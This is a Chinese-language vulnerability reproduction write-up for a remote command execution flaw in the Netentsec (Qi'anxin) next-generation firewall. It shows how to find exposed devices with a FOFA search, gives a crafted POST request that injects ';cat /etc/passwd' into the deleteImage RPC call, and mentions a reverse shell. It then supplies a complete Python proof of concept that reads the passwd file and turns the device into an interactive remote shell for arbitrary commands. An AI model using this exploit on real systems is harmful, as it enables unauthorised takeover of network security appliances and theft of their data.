簡介
網康下一代防火牆(NGFW)是網康科技推出的一款可全面應對網絡威脅的高性能應用層防火牆。憑借超強的應用識别能力,下一代防火牆可深入洞察網絡流量中的使用者、應用和内容,借助全新的高性能單路徑異構并行處理引擎,在網際網路出口、資料中心邊界、應用服務前端等場景提供高效的應用層一體化安全防護,幫助使用者安全地開展業務并降低安全成本。
漏洞概述
存在遠端指令執行漏洞,攻擊者可以擷取伺服器權限。
影響範圍
奇安信 網康下一代防火牆
FOFA
複現過程
fofa搜尋:
![](https://img.laitimes.com/img/__Qf2AjLwojIjJCLyojI0JCLiAzNfRHLGZkRGZkRfJ3bs92YsYTMfVmepNHL4VEVOlXU65UMRpHW4Z0MMBjVtJWd0ckW65UbM5WOHJWa5kHT20ESjBjUIF2X0hXZ0xCMx81dvRWYoNHLrdEZwZ1Rh5WNXp1bwNjW1ZUba9VZwlHdssmch1mclRXY39CXldWYtlWPzNXZj9mcw1ycz9WL49zZuBnL2IDO3UjMycTM0EDNwEjMwIzLc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
登入頁面:
使用burpsuite進行抓包,并構造資料包:
變更發包方式:POST /directdata/direct/router HTTP/1.1
添加POST資料:{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
訪問 test.txt 獲得資料:
反彈shell
POC
# @Author:ximo
import requests
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
    """Print the three-line banner naming the product this script checks."""
    banner_rows = (
        '+------------------------------------------',
        '+----------奇安信 網康下一代防火牆-------------',
        '+------------------------------------------',
    )
    for row in banner_rows:
        print(row)
def poc_1(target_url):  # decide whether the target is vulnerable
    """Probe ``target_url`` for the command injection in the ``deleteImage`` RPC call.

    A fixed RPC body is POSTed to ``/directdata/direct/router``. Its
    ``deleteImage`` path argument ends in
    ``;cat /etc/passwd >/var/www/html/test.txt``. When the reply is HTTP 200
    and contains ``"result":{"success":true}``, the function waits three
    seconds and fetches ``/test.txt``. If that reply contains the root
    passwd entry, the content is printed and an interactive loop passes each
    typed command to ``poc_2`` until ``exit`` is entered.

    Args:
        target_url: Base URL of the device; request paths are appended as-is.

    Returns:
        None. All results are printed. Any exception is reported only as
        '請求失敗'.
    """
    endpoint = target_url + '/directdata/direct/router'
    request_headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)',
        "Content-Type": "application/json",
    }
    payload = '{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}'
    try:
        # verify=False below turns off TLS certificate validation; this call
        # only silences the warning urllib3 would print about it.
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        # First request: the command output is redirected into test.txt in
        # the web root. Nothing in this script removes that file afterwards,
        # so a leftover /var/www/html/test.txt is a trace of this check.
        write_resp = requests.post(url=endpoint, headers=request_headers, data=payload, verify=False, timeout=5)
        accepted = write_resp.status_code == 200 and '"result":{"success":true}' in write_resp.text
        # NOTE(review): the source lost its indentation; the "not vulnerable"
        # branch is attached to this first response check here. Confirm
        # against the author's original.
        if not accepted:
            print('目标不存在漏洞')
            return
        print('目标{}可能存在漏洞,正在執行 cat /etc/passwd'.format(target_url))
        time.sleep(3)
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        # Second request: read back the page holding the command output.
        # This call passes no timeout, unlike the POST above.
        read_resp = requests.get(url=target_url + '/test.txt', headers=request_headers, verify=False)
        confirmed = read_resp.status_code == 200 and 'root:x:0:0:root:/root:/bin/bash' in read_resp.text
        if not confirmed:
            return
        print('結果為:\n{}'.format(read_resp.text))
        # Forward further operator commands until "exit" is typed.
        while True:
            command = input('輸入想要執行的指令,輸入exit退出\nCmd>>>')
            if command == 'exit':
                break
            poc_2(target_url, command)
    except Exception:
        print('請求失敗')
def poc_2(target_url, cmd):  # run an operator-supplied command
    """Send ``cmd`` through the same ``deleteImage`` RPC call and print its output.

    ``cmd`` is placed with ``%`` formatting after the ``;`` in the path
    argument, with its output redirected to ``/var/www/html/test.txt``. When
    the POST reply is HTTP 200 and contains ``"result":{"success":true}``,
    the function waits three seconds, fetches ``/test.txt`` and prints the
    body without checking that second reply's status code.

    Args:
        target_url: Base URL of the device; request paths are appended as-is.
        cmd: Command text inserted verbatim into the request body.

    Returns:
        None. Output is printed. Any exception is reported only as
        '請求失敗'.
    """
    endpoint = target_url + '/directdata/direct/router'
    request_headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)',
        "Content-Type": "application/json",
    }
    payload = '{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;%s >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}' % (cmd)
    try:
        # verify=False below turns off TLS certificate validation; this call
        # only silences the warning urllib3 would print about it.
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        # The command output overwrites test.txt in the web root on each call.
        write_resp = requests.post(url=endpoint, headers=request_headers, data=payload, verify=False, timeout=5)
        accepted = write_resp.status_code == 200 and '"result":{"success":true}' in write_resp.text
        if accepted:
            print('正在執行 {}'.format(cmd))
            time.sleep(3)
            requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
            # Fetch the page holding the command output (no timeout is set).
            read_resp = requests.get(url=target_url + '/test.txt', headers=request_headers, verify=False)
            print('結果為:\n{}'.format(read_resp.text))
    except Exception:
        print('請求失敗')
if __name__ == '__main__':
    # Script entry point: print the banner, read the base URL from stdin
    # (the prompt is wrapped in ANSI colour codes), then run the check.
    title()
    # input() already returns str, so no conversion is needed.
    target_url = input("\033[35m請輸入url\nUrl >>> \033[0m")
    poc_1(target_url)